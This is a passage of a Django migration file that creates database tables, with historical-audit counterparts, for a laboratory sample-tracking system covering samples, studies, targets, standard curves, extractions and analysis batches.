('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('study_site_name', models.CharField(blank=True, max_length=128)),
('collaborator_sample_id', models.CharField(max_length=128, unique=True)),
('sampler_name', models.CharField(blank=True, max_length=128)),
('sample_notes', models.TextField(blank=True)),
('sample_description', models.TextField(blank=True)),
('arrival_date', models.DateField(blank=True, null=True)),
('arrival_notes', models.TextField(blank=True)),
('collection_start_date', models.DateField(db_index=True)),
('collection_start_time', models.TimeField(blank=True, null=True)),
('collection_end_date', models.DateField(blank=True, null=True)),
('collection_end_time', models.TimeField(blank=True, null=True)),
('meter_reading_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('meter_reading_final', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('total_volume_sampled_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('total_volume_or_mass_sampled', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('sample_volume_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('filter_born_on_date', models.DateField(blank=True, null=True)),
('filter_flag', models.BooleanField(default=False)),
('secondary_concentration_flag', models.BooleanField(default=False)),
('elution_notes', models.TextField(blank=True)),
('technician_initials', models.CharField(blank=True, max_length=128)),
('dissolution_volume', liliapi.models.NullableNonzeroDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('post_dilution_volume', liliapi.models.NullableNonzeroDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
],
options={
'db_table': 'lili_sample',
'ordering': ['id'],
},
),
migrations.CreateModel(
name='SampleGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('description', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplegroup_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplegroup_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_samplegroup',
},
),
migrations.CreateModel(
name='UnitHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('symbol', models.CharField(db_index=True, max_length=128)),
('description', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical unit',
'db_table': 'lili_unithistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='Unit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('symbol', models.CharField(max_length=128, unique=True)),
('description', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='unit_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='unit_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_unit',
},
),
migrations.CreateModel(
name='TargetHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('code', models.CharField(db_index=True, max_length=128)),
('notes', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('nucleic_acid_type', models.ForeignKey(blank=True, db_constraint=False, default=1, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.NucleicAcidType')),
],
options={
'verbose_name': 'historical target',
'db_table': 'lili_targethistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='Target',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('code', models.CharField(max_length=128, unique=True)),
('notes', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='target_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='target_modifier', to=settings.AUTH_USER_MODEL)),
('nucleic_acid_type', models.ForeignKey(default=1, on_delete=django.db.models.deletion.PROTECT, to='liliapi.NucleicAcidType')),
],
options={
'db_table': 'lili_target',
},
),
migrations.CreateModel(
name='StudyHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('description', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical study',
'db_table': 'lili_studyhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='Study',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('description', models.TextField(blank=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='study_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='study_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'studies',
'db_table': 'lili_study',
},
),
migrations.CreateModel(
name='StatusHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical status',
'db_table': 'lili_statushistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='Status',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='status_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='status_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_status',
},
),
migrations.CreateModel(
name='StandardCurveHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('r_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('slope', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('efficiency', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pos_ctrl_cq', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pos_ctrl_cq_range', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical standard curve',
'db_table': 'lili_standardcurvehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='StandardCurve',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('r_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('slope', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('efficiency', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pos_ctrl_cq', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pos_ctrl_cq_range', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='standardcurve_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='standardcurve_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_standardcurve',
},
),
migrations.CreateModel(
name='SampleTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('code', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical sample type',
'db_table': 'lili_sampletypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='SampleType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('code', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampletype_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampletype_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_sampletype',
},
),
migrations.CreateModel(
name='SampleSampleGroupHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
('samplegroup', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.SampleGroup')),
],
options={
'verbose_name': 'historical sample sample group',
'db_table': 'lili_samplesamplegrouphistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='SampleSampleGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplesamplegroup_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='samplesamplegroup_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='liliapi.Sample')),
('samplegroup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='liliapi.SampleGroup')),
],
options={
'db_table': 'lili_samplesamplegroup',
'unique_together': {('sample', 'samplegroup')},
},
),
migrations.CreateModel(
name='SampleHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('study_site_name', models.CharField(blank=True, max_length=128)),
('collaborator_sample_id', models.CharField(db_index=True, max_length=128)),
('sampler_name', models.CharField(blank=True, max_length=128)),
('sample_notes', models.TextField(blank=True)),
('sample_description', models.TextField(blank=True)),
('arrival_date', models.DateField(blank=True, null=True)),
('arrival_notes', models.TextField(blank=True)),
('collection_start_date', models.DateField(db_index=True)),
('collection_start_time', models.TimeField(blank=True, null=True)),
('collection_end_date', models.DateField(blank=True, null=True)),
('collection_end_time', models.TimeField(blank=True, null=True)),
('meter_reading_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('meter_reading_final', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('total_volume_sampled_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('total_volume_or_mass_sampled', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('sample_volume_initial', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('filter_born_on_date', models.DateField(blank=True, null=True)),
('filter_flag', models.BooleanField(default=False)),
('secondary_concentration_flag', models.BooleanField(default=False)),
('elution_notes', models.TextField(blank=True)),
('technician_initials', models.CharField(blank=True, max_length=128)),
('dissolution_volume', liliapi.models.NullableNonzeroDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('post_dilution_volume', liliapi.models.NullableNonzeroDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('filter_type', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.FilterType')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('matrix', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Matrix')),
('meter_reading_unit', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Unit')),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('peg_neg', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
('record_type', models.ForeignKey(blank=True, db_constraint=False, default=1, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.RecordType')),
('sample_type', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.SampleType')),
('study', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Study')),
('total_volume_sampled_unit_initial', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Unit')),
],
options={
'verbose_name': 'historical sample',
'db_table': 'lili_samplehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='SampleGroupHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('description', models.TextField(blank=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical sample group',
'db_table': 'lili_samplegrouphistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='SampleExtractionHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionBatch')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('inhibition_dna', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Inhibition')),
('inhibition_rna', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Inhibition')),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
],
options={
'verbose_name': 'historical sample extraction',
'db_table': 'lili_sampleextractionhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='SampleExtraction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampleextraction_creator', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sampleextractions', to='liliapi.ExtractionBatch')),
('inhibition_dna', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='sampleextractionsdna', to='liliapi.Inhibition')),
('inhibition_rna', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='sampleextractionsrna', to='liliapi.Inhibition')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampleextraction_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sampleextractions', to='liliapi.Sample')),
],
options={
'db_table': 'lili_sampleextraction',
'ordering': ['sample', 'id'],
'unique_together': {('sample', 'extraction_batch')},
},
),
migrations.CreateModel(
name='SampleAnalysisBatchHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('analysis_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.AnalysisBatch')),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
],
options={
'verbose_name': 'historical sample analysis batch',
'db_table': 'lili_sampleanalysisbatchhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='SampleAnalysisBatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('analysis_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='liliapi.AnalysisBatch')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampleanalysisbatch_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='sampleanalysisbatch_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='liliapi.Sample')),
],
options={
'verbose_name_plural': 'sampleanalysisbatches',
'db_table': 'lili_sampleanalysisbatch',
